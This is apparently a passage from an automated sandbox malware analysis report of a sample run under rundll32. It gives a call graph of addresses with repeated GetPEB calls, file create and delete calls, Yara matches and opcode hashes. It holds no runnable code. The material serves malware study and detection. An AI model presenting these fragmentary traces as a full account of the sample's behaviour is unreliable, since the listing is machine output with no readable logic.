350beb1 5293->5294 5295 350eb52 GetPEB 5294->5295 5296 350bf53 5295->5296 5296->5278 5298 3521631 5297->5298 5299 350eb52 GetPEB 5298->5299 5300 35216b5 5299->5300 5300->4982 5302 3522a49 5301->5302 5303 350eb52 GetPEB 5302->5303 5304 3522afe 5303->5304 5304->4982 5311 3506b9c 5305->5311 5306 3522b09 GetPEB 5306->5311 5308 350706b 5308->4995 5310 350c5d8 2 API calls 5310->5311 5311->5306 5311->5308 5311->5310 5370 35207aa 5311->5370 5375 351c9b0 5311->5375 5379 35246bd 5311->5379 5318 35157ab 5313->5318 5314 3516086 5317 3522b09 GetPEB 5314->5317 5316 3522b09 GetPEB 5316->5318 5320 3516084 5317->5320 5318->5314 5318->5316 5319 35057b8 2 API calls 5318->5319 5318->5320 5323 350c5d8 2 API calls 5318->5323 5324 351c9b0 GetPEB 5318->5324 5428 3505026 5318->5428 5432 350e7de 5318->5432 5437 350fb8e 5318->5437 5319->5318 5320->4995 5323->5318 5324->5318 5326 35083f1 5325->5326 5327 351e1f8 2 API calls 5326->5327 5328 350854c 5326->5328 5331 35231aa GetPEB 5326->5331 5332 350854a 5326->5332 5333 350c5d8 2 API calls 5326->5333 5334 351fecb GetPEB 5326->5334 5444 3520a64 5326->5444 5327->5326 5329 3522b09 GetPEB 5328->5329 5329->5332 5331->5326 5332->4995 5333->5326 5334->5326 5352 351393f 5335->5352 5336 350c5d8 GetPEB RtlAllocateHeap 5336->5352 5337 3514244 2 API calls 5337->5352 5339 3513d59 5341 3522b09 GetPEB 5339->5341 5340 351c9b0 GetPEB 5340->5352 5342 3513a00 5341->5342 5342->4995 5343 3513992 5449 3514244 5343->5449 5344 351e1f8 2 API calls 5344->5352 5345 351fecb GetPEB 5345->5352 5347 35139af 5453 3503325 5347->5453 5348 35231aa GetPEB 5348->5352 5351 351fecb GetPEB 5351->5342 5352->5336 5352->5337 5352->5339 5352->5340 5352->5342 5352->5343 5352->5344 5352->5345 5352->5348 5457 351e1ac 5352->5457 5369 3516859 5353->5369 5354 351e1f8 2 API calls 5354->5369 5355 351792e 5493 351e358 5355->5493 5360 351e358 GetPEB 5360->5369 5362 3517943 5362->4995 5363 3522b09 GetPEB 5363->5369 5364 351fecb GetPEB 5364->5369 5367 3523e0e GetPEB 5367->5369 5369->5354 5369->5355 5369->5360 5369->5362 5369->5363 5369->5364 5369->5367 5461 350ed66 5369->5461 5465 350dda9 5369->5465 5469 3504bfc 5369->5469 5478 35210dc 5369->5478 5482 350ef0c 5369->5482 5485 3504a88 5369->5485 5489 351c8cf 5369->5489 5373 35207c6 5370->5373 5374 3520a10 5373->5374 5385 35057b8 5373->5385 5400 3524d53 5373->5400 5374->5311 5376 351c9cc 5375->5376 5424 350db68 5376->5424 5380 35246ed 5379->5380 5381 3522b09 GetPEB 5380->5381 5382 350c5d8 2 API calls 5380->5382 5383 35211b0 GetPEB 5380->5383 5384 3524d2e 5380->5384 5381->5380 5382->5380 5383->5380 5384->5311 5398 35057fa 5385->5398 5387 350c5d8 2 API calls 5387->5398 5389 35066de 5390 350f7fe GetPEB 5389->5390 5392 35066dc 5390->5392 5391 351e1f8 GetPEB RtlAllocateHeap 5391->5398 5392->5373 5394 350738a GetPEB 5394->5398 5395 3522b09 GetPEB 5395->5398 5398->5387 5398->5389 5398->5391 5398->5392 5398->5394 5398->5395 5399 351fecb GetPEB 5398->5399 5404 351cbe9 5398->5404 5408 35022c9 5398->5408 5412 3501bc9 5398->5412 5416 350f288 5398->5416 5420 35212c1 5398->5420 5399->5398 5401 3524d85 5400->5401 5402 350eb52 GetPEB 5401->5402 5403 3524e23 5402->5403 5403->5373 5405 351cc0e 5404->5405 5406 350eb52 GetPEB 5405->5406 5407 351cc8d 5406->5407 5407->5398 5409 35022e8 5408->5409 5410 350eb52 GetPEB 5409->5410 5411 3502377 5410->5411 5411->5398 5413 3501bfb 5412->5413 5414 350eb52 GetPEB 5413->5414 5415 3501c85 5414->5415 5415->5398 5417 350f2b2 5416->5417 5418 350eb52 GetPEB 5417->5418 5419 350f350 5418->5419 5419->5398 5421 35212da 5420->5421 5422 350eb52 GetPEB 5421->5422 5423 3521380 5422->5423 5423->5398 5425 350db84 5424->5425 5426 350eb52 GetPEB 5425->5426 5427 350dc0b 5426->5427 5427->5311 5429 350503c 5428->5429 5430 351c9b0 GetPEB 5429->5430 5431 35050e1 5430->5431 5431->5318 5436 350e806 5432->5436 5433 351cad5 GetPEB 5433->5436 5434 350c5d8 2 API calls 5434->5436 5435 350eb40 5435->5318 5436->5433 5436->5434 5436->5435 5441 350fbad 5437->5441 5438 350c5d8 2 API calls 5438->5441 5439 3510084 5439->5318 5440 3510086 5443 3522b09 GetPEB 5440->5443 5441->5438 5441->5439 5441->5440 5442 3502194 GetPEB 5441->5442 5442->5441 5443->5439 5447 3520a7e 5444->5447 5445 351c4f8 GetPEB 5445->5447 5446 350c5d8 2 API calls 5446->5447 5447->5445 5447->5446 5448 3520da7 5447->5448 5448->5326 5450 351425e 5449->5450 5451 350c5d8 2 API calls 5450->5451 5452 351430e 5451->5452 5452->5347 5452->5452 5454 350333e 5453->5454 5455 35231aa GetPEB 5454->5455 5456 350335a 5455->5456 5456->5351 5458 351e1ce 5457->5458 5459 35231aa GetPEB 5458->5459 5460 351e1f0 5459->5460 5460->5352 5462 350eda1 5461->5462 5463 350eb52 GetPEB 5462->5463 5464 350ee49 5463->5464 5464->5369 5466 350ddcb 5465->5466 5467 350eb52 GetPEB 5466->5467 5468 350de63 5467->5468 5468->5369 5476 3504ec7 5469->5476 5471 3504fee 5472 3505009 5471->5472 5473 3522b09 GetPEB 5471->5473 5472->5369 5473->5472 5474 350c5d8 GetPEB RtlAllocateHeap 5474->5476 5475 351c9b0 GetPEB 5475->5476 5476->5471 5476->5474 5476->5475 5477 3522b09 GetPEB 5476->5477 5497 3519c65 5476->5497 5477->5476 5479 3521100 5478->5479 5480 350eb52 GetPEB 5479->5480 5481 352119a 5480->5481 5481->5369 5501 35160b8 5482->5501 5486 3504abc 5485->5486 5487 350eb52 GetPEB 5486->5487 5488 3504b44 5487->5488 5488->5369 5490 351c8f4 5489->5490 5491 350eb52 GetPEB 5490->5491 5492 351c99d 5491->5492 5492->5369 5494 351e36b 5493->5494 5495 350eb52 GetPEB 5494->5495 5496 351e3fa 5495->5496 5496->5362 5498 3519c85 5497->5498 5499 350eb52 GetPEB 5498->5499 5500 3519d29 5499->5500 5500->5476 5502 35160de 5501->5502 5503 350eb52 GetPEB 5502->5503 5504 350efd1 5503->5504 5504->5369 5516 3501f38 5505->5516 5509 3510ade 5508->5509 5539 351f790 5509->5539 5512 3510c1f 5512->5006 5515 3521538 2 API calls 5515->5512 5520 3501f57 5516->5520 5522 35020da 5520->5522 5523 35020cc 5520->5523 5525 3507603 5520->5525 5528 35206ec 5520->5528 5532 350bd23 5520->5532 5536 350e5c0 5520->5536 5522->5006 5524 3521538 2 API calls 5523->5524 5524->5522 5526 350eb52 GetPEB 5525->5526 5527 35076d3 5526->5527 5527->5520 5529 3520702 5528->5529 5530 350eb52 GetPEB 5529->5530 5531 352079c 5530->5531 5531->5520 5533 350bd40 5532->5533 5534 350eb52 GetPEB 5533->5534 5535 350bdeb 5534->5535 5535->5520 5537 350556b GetPEB 5536->5537 5538 350e625 5537->5538 5538->5520 5540 350eb52 GetPEB 5539->5540 5541 3510bf0 5540->5541 5541->5512 5542 350daaa 5541->5542 5543 350dac8 5542->5543 5544 350eb52 GetPEB 5543->5544 5545 350db55 5544->5545 5545->5515 5547 352451c 5546->5547 5548 350eb52 GetPEB 5547->5548 5549 35245b7 5548->5549 5549->5015 5551 35053e3 5550->5551 5552 350eb52 GetPEB 5551->5552 5553 350546b 5552->5553 5553->4875 5555 3512d03 5554->5555 5556 350eb52 GetPEB 5555->5556 5557 3512d8e 5556->5557 5557->5035 5559 3502e23 5558->5559 5560 350eb52 GetPEB 5559->5560 5561 3502ea5 5560->5561 5561->5035 5563 350f997 5562->5563 5564 35231aa GetPEB 5563->5564 5565 350f9b9 5564->5565 5565->5035 5568 351b27f 5566->5568 5567 351bb76 5569 3522b09 GetPEB 5567->5569 5568->5567 5570 350c5d8 GetPEB RtlAllocateHeap 5568->5570 5571 351bb89 5568->5571 5574 350ee62 GetPEB 5568->5574 5576 3522b09 GetPEB 5568->5576 5577 350dc1b GetPEB 5568->5577 5578 3503046 GetPEB 5568->5578 5583 350fa95 5568->5583 5587 351fd4e 5568->5587 5591 350c3a7 5568->5591 5569->5571 5570->5568 5571->5047 5574->5568 5576->5568 5577->5568 5578->5568 5580 3517c9b 5579->5580 5581 350eb52 GetPEB 5580->5581 5582 3517d35 5581->5582 5582->5047 5584 350fad4 5583->5584 5585 350eb52 GetPEB 5584->5585 5586 350fb70 5585->5586 5586->5568 5588 351fd79 5587->5588 5589 350eb52 GetPEB 5588->5589 5590 351fe12 5589->5590 5590->5568 5592 350c3c9 5591->5592 5593 350eb52 GetPEB 5592->5593 5594 350c463 5593->5594 5594->5568 5598 3519e1d 5595->5598 5596 3514244 2 API calls 5596->5598 5598->5596 5600 351a1b5 5598->5600 5602 351fecb GetPEB 5598->5602 5603 35196c2 5598->5603 5607 3515515 5598->5607 5612 3520a1a 5598->5612 5600->5056 5602->5598 5604 35196db 5603->5604 5605 350eb52 GetPEB 5604->5605 5606 3519765 5605->5606 5606->5598 5616 3510de5 5607->5616 5609 3515670 5609->5598 5613 3520a3f 5612->5613 5614 35231aa GetPEB 5613->5614 5615 3520a5c 5614->5615 5615->5598 5617 3510dfe 5616->5617 5618 350eb52 GetPEB 5617->5618 5619 3510eae 5618->5619 5619->5609 5620 352138b 5619->5620 5621 35213b8 5620->5621 5622 350eb52 GetPEB 5621->5622 5623 3521475 5622->5623 5623->5609 5625 351b1af 5624->5625 5626 350eb52 GetPEB 5625->5626 5627 351b248 5626->5627 5627->4875 5647 35183d6 5628->5647 5629 351851b 5631 3501a34 GetPEB 5629->5631 5630 3518516 5630->5064 5633 351854b 5631->5633 5632 3520db1 GetPEB 5632->5647 5634 351e1f8 2 API calls 5633->5634 5636 3518565 5634->5636 5635 35109dd GetPEB 5635->5647 5637 3522d0a GetPEB 5636->5637 5638 35185a6 5637->5638 5640 351fecb GetPEB 5638->5640 5641 35185c6 5640->5641 5643 35185ff 2 API calls 5641->5643 5642 351e1f8 2 API calls 5642->5647 5643->5630 5644 3522d0a GetPEB 5644->5647 5645 351fecb GetPEB 5645->5647 5647->5629 5647->5630 5647->5632 5647->5635 5647->5642 5647->5644 5647->5645 5745 350baa9 5647->5745 5749 350bfbe 5647->5749 5649 35204c6 5648->5649 5650 35205e9 5649->5650 5652 3520db1 GetPEB 5649->5652 5653 35205e7 5649->5653 5654 35109dd GetPEB 5649->5654 5655 350baa9 GetPEB 5649->5655 5656 351e1f8 2 API calls 5649->5656 5657 3522d0a GetPEB 5649->5657 5658 351fecb GetPEB 5649->5658 5659 350bfbe 3 API calls 5649->5659 5651 35185ff 2 API calls 5650->5651 5651->5653 5652->5649 5653->5064 5654->5649 5655->5649 5656->5649 5657->5649 5658->5649 5659->5649 5664 350ba26 5660->5664 5661 350ba9c 5661->5064 5662 3522b09 GetPEB 5662->5664 5663 3521028 GetPEB 5663->5664 5664->5661 5664->5662 5664->5663 5666 3521538 2 API calls 5664->5666 5760 350f0e9 5664->5760 5666->5664 5768 3521f6d 5667->5768 5669 3522b09 GetPEB 5685 350b3e7 5669->5685 5670 3520a64 2 API calls 5670->5685 5672 3501a34 GetPEB 5672->5685 5673 35185ff 2 API calls 5673->5685 5674 350b7fb 5674->5064 5675 35244ad GetPEB 5675->5685 5676 350b7fd 5678 3521538 2 API calls 5676->5678 5677 3520db1 GetPEB 5677->5685 5678->5674 5679 35100c5 GetPEB 5679->5685 5680 351fecb GetPEB 5680->5685 5681 35109dd GetPEB 5681->5685 5682 350baa9 GetPEB 5682->5685 5684 351e1f8 GetPEB RtlAllocateHeap 5684->5685 5685->5669 5685->5670 5685->5672 5685->5673 5685->5674 5685->5675 5685->5676 5685->5677 5685->5679 5685->5680 5685->5681 5685->5682 5685->5684 5686 3522d0a GetPEB 5685->5686 5687 350bfbe 3 API calls 5685->5687 5771 350f726 5685->5771 5775 351d8db 5685->5775 5686->5685 5687->5685 5694 351cfe9 5688->5694 5689 351d0f1 5689->5064 5690 351d0f3 5692 350f0e9 GetPEB 5690->5692 5692->5689 5694->5689 5694->5690 5785 3510ebc 5694->5785 5789 3523263 5694->5789 5797 350e2bd 5694->5797 5700 3502ad8 5696->5700 5697 351c387 GetPEB 5697->5700 5698 3502d78 5699 35185ff 2 API calls 5698->5699 5702 3502da8 5699->5702 5700->5697 5700->5698 5704 3502d62 5700->5704 5707 3520db1 GetPEB 5700->5707 5708 3502d64 5700->5708 5709 3521538 GetPEB FindCloseChangeNotification 5700->5709 5711 35109dd GetPEB 5700->5711 5712 350baa9 GetPEB 5700->5712 5713 351e1f8 2 API calls 5700->5713 5714 3522d0a GetPEB 5700->5714 5715 351fecb GetPEB 5700->5715 5716 350bfbe 3 API calls 5700->5716 5810 3519774 5700->5810 5818 351017b 5700->5818 5827 351bc6b 5700->5827 5702->5704 5706 3521538 2 API calls 5702->5706 5704->5064 5705 3521538 2 API calls 5705->5704 5706->5708 5707->5700 5708->5705 5709->5700 5711->5700 5712->5700 5713->5700 5714->5700 5715->5700 5716->5700 5735 351aadf 5717->5735 5718 351ac24 5720 3501a34 GetPEB 5718->5720 5719 351ac1f 5719->5064 5722 351ac51 5720->5722 5721 3520db1 GetPEB 5721->5735 5723 351e1f8 2 API calls 5722->5723 5725 351ac74 5723->5725 5724 35109dd GetPEB 5724->5735 5726 3522d0a GetPEB 5725->5726 5727 351acaf 5726->5727 5729 351fecb GetPEB 5727->5729 5728 350baa9 GetPEB 5728->5735 5730 351accf 5729->5730 5732 35185ff 2 API calls 5730->5732 5731 351e1f8 2 API calls 5731->5735 5732->5719 5733 3522d0a GetPEB 5733->5735 5734 351fecb GetPEB 5734->5735 5735->5718 5735->5719 5735->5721 5735->5724 5735->5728 5735->5731 5735->5733 5735->5734 5736 350bfbe 3 API calls 5735->5736 5736->5735 5742 352307f 5737->5742 5738 352318a 5738->5064 5739 3523263 GetPEB 5739->5742 5740 352318c 5741 350f0e9 GetPEB 5740->5741 5741->5738 5742->5738 5742->5739 5742->5740 5743 3510ebc GetPEB 5742->5743 5744 350e2bd GetPEB 5742->5744 5743->5742 5744->5742 5746 350bac2 5745->5746 5747 350dc1b GetPEB 5746->5747 5748 350bb97 5747->5748 5748->5647 5752 350bfd7 5749->5752 5750 350c273 5753 3521538 2 API calls 5750->5753 5751 35245ca 2 API calls 5751->5752 5752->5750 5752->5751 5754 350c271 5752->5754 5756 351c41a 5752->5756 5753->5754 5754->5647 5757 351c440 5756->5757 5758 350eb52 GetPEB 5757->5758 5759 351c4e1 5758->5759 5759->5752 5761 350f0ff 5760->5761 5764 350f8a9 5761->5764 5765 350f8c6 5764->5765 5766 350eb52 GetPEB 5765->5766 5767 350f1c3 5766->5767 5767->5664 5769 350eb52 GetPEB 5768->5769 5770 3522000 5769->5770 5770->5685 5772 350f758 5771->5772 5773 350eb52 GetPEB 5772->5773 5774 350f7dc 5773->5774 5774->5685 5780 351d8fb 5775->5780 5776 350c5d8 2 API calls 5776->5780 5777 351db95 5781 351cad5 5777->5781 5778 351db93 5778->5685 5780->5776 5780->5777 5780->5778 5782 351caef 5781->5782 5783 351c9b0 GetPEB 5782->5783 5784 351cbda 5783->5784 5784->5778 5786 3510ede 5785->5786 5787 350eb52 GetPEB 5786->5787 5788 3510f72 5787->5788 5788->5694 5790 352327e 5789->5790 5791 3523556 5790->5791 5802 35162c7 5790->5802 5791->5694 5794 351c9b0 GetPEB 5795 352350d 5794->5795 5795->5791 5796 351c9b0 GetPEB 5795->5796 5796->5795 5800 350e2d8 5797->5800 5798 350e3f5 5798->5694 5799 350483c GetPEB 5799->5800 5800->5798 5800->5799 5806 3501afd 5800->5806 5803 35162eb 5802->5803 5804 350eb52 GetPEB 5803->5804 5805 3516383 5804->5805 5805->5791 5805->5794 5807 3501b10 5806->5807 5808 350eb52 GetPEB 5807->5808 5809 3501bba 5808->5809 5809->5800 5814 3519797 5810->5814 5812 3519967 5812->5700 5813 351bc6b GetPEB 5813->5814 5814->5812 5814->5813 5815 3519956 5814->5815 5830 35072c4 5814->5830 5834 350f9c1 5814->5834 5817 3521538 2 API calls 5815->5817 5817->5812 5820 35101c2 5818->5820 5822 351fe2a GetPEB 5820->5822 5823 35106f1 5820->5823 5824 351e1f8 2 API calls 5820->5824 5826 351fecb GetPEB 5820->5826 5838 350473d 5820->5838 5842 3514178 5820->5842 5846 3517952 5820->5846 5822->5820 5823->5700 5824->5820 5826->5820 5828 350eb52 GetPEB 5827->5828 5829 351bd0a 5828->5829 5829->5700 5831 35072e0 5830->5831 5832 350eb52 GetPEB 5831->5832 5833 350737c 5832->5833 5833->5814 5835 350f9eb 5834->5835 5836 350eb52 GetPEB 5835->5836 5837 350fa7c 5836->5837 5837->5814 5839 3504786 5838->5839 5840 350eb52 GetPEB 5839->5840 5841 350481a 5840->5841 5841->5820 5843 3514194 5842->5843 5844 350eb52 GetPEB 5843->5844 5845 3514233 5844->5845 5845->5820 5847 3517965 5846->5847 5848 350eb52 GetPEB 5847->5848 5849 3517a04 5848->5849 5849->5820 5851 350dd30 5850->5851 5852 350dd16 5850->5852 5851->5076 5852->5851 5853 3522b09 GetPEB 5852->5853 5853->5852 5861 35241ee 5854->5861 5855 351e1f8 2 API calls 5855->5861 5857 350f96f GetPEB 5857->5861 5858 35243b4 5859 3522b09 GetPEB 5858->5859 5863 35243c9 5859->5863 5860 351fecb GetPEB 5860->5861 5861->5855 5861->5857 5861->5858 5861->5860 5862 350c5d8 2 API calls 5861->5862 5861->5863 5868 3513d85 5861->5868 5862->5861 5863->5076 5865 350328d 5864->5865 5872 3507442 5865->5872 5869 3513d9c 5868->5869 5870 350c5d8 2 API calls 5869->5870 5871 3513e5b 5870->5871 5871->5861 5871->5871 5873 3507462 5872->5873 5874 350c5d8 2 API calls 5873->5874 5877 3507576 5873->5877 5878 350331d 5873->5878 5881 3518fae 5873->5881 5890 3510d04 5873->5890 5895 3510f86 5873->5895 5874->5873 5880 3522b09 GetPEB 5877->5880 5878->5076 5880->5878 5882 35194f3 5881->5882 5883 351969b 5882->5883 5884 3519699 5882->5884 5886 351e1f8 GetPEB RtlAllocateHeap 5882->5886 5888 350738a GetPEB 5882->5888 5889 351fecb GetPEB 5882->5889 5912 350bc32 5882->5912 5885 350f7fe GetPEB 5883->5885 5884->5873 5885->5884 5886->5882 5888->5882 5889->5882 5916 3502ebf 5890->5916 5893 3522b09 GetPEB 5894 3510dde 5893->5894 5894->5873 5911 3511c7c 5895->5911 5896 351e1f8 GetPEB RtlAllocateHeap 5896->5911 5898 351c237 GetPEB 5898->5911 5899 3502ebf GetPEB 5899->5911 5900 350bc32 GetPEB 5900->5911 5902 3512118 5906 350f7fe GetPEB 5902->5906 5904 351fecb GetPEB 5904->5911 5905 3512116 5905->5873 5906->5905 5908 350738a GetPEB 5908->5911 5910 351c9b0 GetPEB 5910->5911 5911->5896 5911->5898 5911->5899 5911->5900 5911->5902 5911->5904 5911->5905 5911->5908 5911->5910 5920 3503431 5911->5920 5935 35216c0 5911->5935 5939 351c2cf 5911->5939 5943 35243e6 5911->5943 5947 35051e7 5911->5947 5913 350bc62 5912->5913 5914 350eb52 GetPEB 5913->5914 5915 350bd08 5914->5915 5915->5882 5917 3502ed3 5916->5917 5918 350eb52 GetPEB 5917->5918 5919 3502f74 5918->5919 5919->5893 5923 3504267 5920->5923 5921 3522b09 GetPEB 5921->5923 5922 3504738 5922->5922 5923->5921 5923->5922 5924 351e1f8 GetPEB RtlAllocateHeap 5923->5924 5925 35042a0 5923->5925 5926 350f288 GetPEB 5923->5926 5927 350c5d8 2 API calls 5923->5927 5929 35100c5 GetPEB 5923->5929 5932 351fecb GetPEB 5923->5932 5933 350738a GetPEB 5923->5933 5951 35050e8 5923->5951 5955 35049a4 5923->5955 5924->5923 5930 350f7fe GetPEB 5925->5930 5926->5923 5927->5923 5929->5923 5931 35042be 5930->5931 5931->5911 5932->5923 5933->5923 5936 35216f5 5935->5936 5937 350eb52 GetPEB 5936->5937 5938 35217a1 5937->5938 5938->5911 5940 351c2e5 5939->5940 5941 350eb52 GetPEB 5940->5941 5942 351c370 5941->5942 5942->5911 5944 3524405 5943->5944 5945 350eb52 GetPEB 5944->5945 5946 3524498 5945->5946 5946->5911 5948 3505206 5947->5948 5949 350eb52 GetPEB 5948->5949 5950 35052a5 5949->5950 5950->5911 5952 3505123 5951->5952 5953 350eb52 GetPEB 5952->5953 5954 35051c6 5953->5954 5954->5923 5956 35049d5 5955->5956 5957 350eb52 GetPEB 5956->5957 5958 3504a6b 5957->5958 5958->5923 5960 35048f4 5959->5960 5961 350eb52 GetPEB 5960->5961 5962 3504996 5961->5962 5962->5086 5964 350bf93 5963->5964 5965 35231aa GetPEB 5964->5965 5966 350bfb6 5965->5966 5966->5100 5973 351dfa2 5967->5973 5968 35053d0 GetPEB 5968->5973 5970 351e1f8 2 API calls 5970->5973 5971 351e0e6 5971->5110 5972 3502dea GetPEB 5972->5973 5973->5968 5973->5970 5973->5971 5973->5972 5974 351fecb GetPEB 5973->5974 5985 352298d 5973->5985 5974->5973 5976 3501cc0 5975->5976 5978 351fe2a GetPEB 5976->5978 5980 3501e90 5976->5980 5989 3502f80 5976->5989 5993 35106fe 5976->5993 5978->5976 5980->5110 5982 3508581 5981->5982 5983 350eb52 GetPEB 5982->5983 5984 350862b 5983->5984 5984->5111 5986 35229a3 5985->5986 5987 350eb52 GetPEB 5986->5987 5988 3522a27 5987->5988 5988->5973 5990 3502f9f 5989->5990 5991 350eb52 GetPEB 5990->5991 5992 3503039 5991->5992 5992->5976 5994 351071c 5993->5994 5995 350eb52 GetPEB 5994->5995 5996 35107dc 5995->5996 5996->5976 6010 35019eb 6011 35019b1 6010->6011 6011->6010 6012 350eb52 GetPEB 6011->6012 6013 3501aeb 6012->6013 5997 351befd 5998 35109dd GetPEB 5997->5998 5999 351c1a1 5998->5999 6000 352061d 2 API calls 5999->6000 6001 351c1b8 6000->6001 6002 351c229 6001->6002 6003 351e1f8 2 API calls 6001->6003 6004 351c1d6 6003->6004 6005 3522d0a GetPEB 6004->6005 6006 351c1ff 6005->6006 6007 351fecb GetPEB 6006->6007 6008 351c212 6007->6008 6009 350d061 2 API calls 6008->6009 6009->6002

                                                                                                          Executed Functions

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID: 1$,*FV$.9h
                                                                                                          • API String ID: 1029625771-1870595533
                                                                                                          • Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                          • Instruction ID: 9135b65517dc24eb2482472a68f68eda2aadad017bc35ac024fc852f868c3e8e
                                                                                                          • Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                          • Instruction Fuzzy Hash: A92156B6D01209FBEF08DFA8D94A9EEBBB5FB40304F108198E815A6250D3B45B14DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.719414263.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.719409694.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
                                                                                                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                                                                                                          • Opcode Fuzzy Hash: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
                                                                                                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNEL32(00040652), ref: 03521615
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID: Zs$d
                                                                                                          • API String ID: 2591292051-3879001491
                                                                                                          • Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                          • Instruction ID: 4af9da6036415e2886b64bcd662db1855ed0c874a459e7f055fd3b9b65240092
                                                                                                          • Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                          • Instruction Fuzzy Hash: 13212CB5D40309EBEB04DFA5D94999DBBB1EB40314F10C099E614BB290D7B95B548F80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0350D145
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID: 3l}!$7XJ
                                                                                                          • API String ID: 4033686569-2205417827
                                                                                                          • Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                          • Instruction ID: 301f276ed0e560c328c08579f1b4e5890a80ae8bc58d20339d383ddd252da3f2
                                                                                                          • Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                          • Instruction Fuzzy Hash: 0D2145B5D01318AFDF18DFA4C98A9DEFBB0FF14304F108188E966A6220D7B85B558F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 035246B5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID: OM
                                                                                                          • API String ID: 823142352-4198367855
                                                                                                          • Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                          • Instruction ID: 0a98ecf56076a4217f6a194523fa8ed90d3bed7922a4d3140ed84ae38ccd4462
                                                                                                          • Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                          • Instruction Fuzzy Hash: C421EE72801249BBCF05DFA9CD46CDEBFB5FF88304F508199F915A6220D3768A61AF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00004000), ref: 10002704
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.719414263.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.719409694.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 1263568516-0
                                                                                                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
